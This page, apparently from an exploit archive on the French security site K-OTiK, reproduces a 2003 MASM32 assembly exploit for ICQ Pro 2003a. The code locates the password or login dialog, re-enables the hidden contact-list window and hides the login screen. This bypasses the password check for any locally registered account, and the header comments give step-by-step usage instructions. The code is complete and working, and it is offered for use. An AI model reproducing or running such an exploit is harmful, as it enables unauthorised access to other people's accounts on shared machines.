ICQ Pro 2003a Password Bypass exploit (ca1-icq.asm)

    
 
     * Version TXT Disponible ici *
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
                              ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF 
                              ; -------------------------------------------------------------------------
                              ;
                              ;  07/02/2003 - ca1-icq.asm 
                              ;  ICQ Password Bypass exploit.
                              ;  written by Caua Moura Prado (aka ca1)
                              ; 
                              ;  This exploit allows you to login to ICQ server using any account registered *locally*
                              ;  no matter the 'save password' option is checked or not. High level security is also bypassed. 
                              ;  All you have to do is run the exploit and set status property using your mouse when the flower
                              ;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run 
                              ;  the exploit again. 
                              ;
                              ;        uh-oh!
                              ;         ___     
                              ;      __/   \__  
                              ;     /  \___/  \        Vulnerable:
                              ;     \__/+ +\__/          ICQ Pro 2003a Build #3800
                              ;     /   ~~~   \
                              ;     \__/   \__/        Not Vulnerable:
                              ;        \___/                ICQ Lite alpha Build 1211
                              ;                               ICQ 2001b and ICQ 2002a 
                              ;    tHe Flaw Power       All other versions were not tested.                       
                              ;                                                      
                              coded with masm32
                              ; ________________________________________________________________exploit born in .br

                              .386
                              .model flat, stdcall
                              option casemap:none
                              include \masm32\include\user32.inc
                              include \masm32\include\kernel32.inc
                              includelib \masm32\lib\user32.lib
                              includelib \masm32\lib\kernel32.lib
                              .data
                              szTextHigh byte 'Password Verification', 0 
                              szTextLow byte 'Login to server', 0
                              szClassName byte '#32770', 0
                              .data?
                              hWndLogin dword ?
                              .code
                              _entrypoint:
                              invoke FindWindow, addr szClassName, addr szTextHigh
                              mov hWndLogin, eax  
                              .if hWndLogin == 0
                              invoke FindWindow, addr szClassName, addr szTextLow
                              mov hWndLogin, eax
                              .endif 
                              invoke GetParent, hWndLogin 
                              invoke EnableWindow, eax, 1      ;Enable ICQ contact 
                              list
                              invoke ShowWindow, hWndLogin, 0  ;get rid of Login 
                              screen (don't kill this window)
                              invoke ExitProcess, 0            ;uhuu.. cya! i gotta 
                              sleep!
                              end _entrypoint

                              ; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
                              ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF 
                              ; -------------------------------------------------------------------------
                              

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits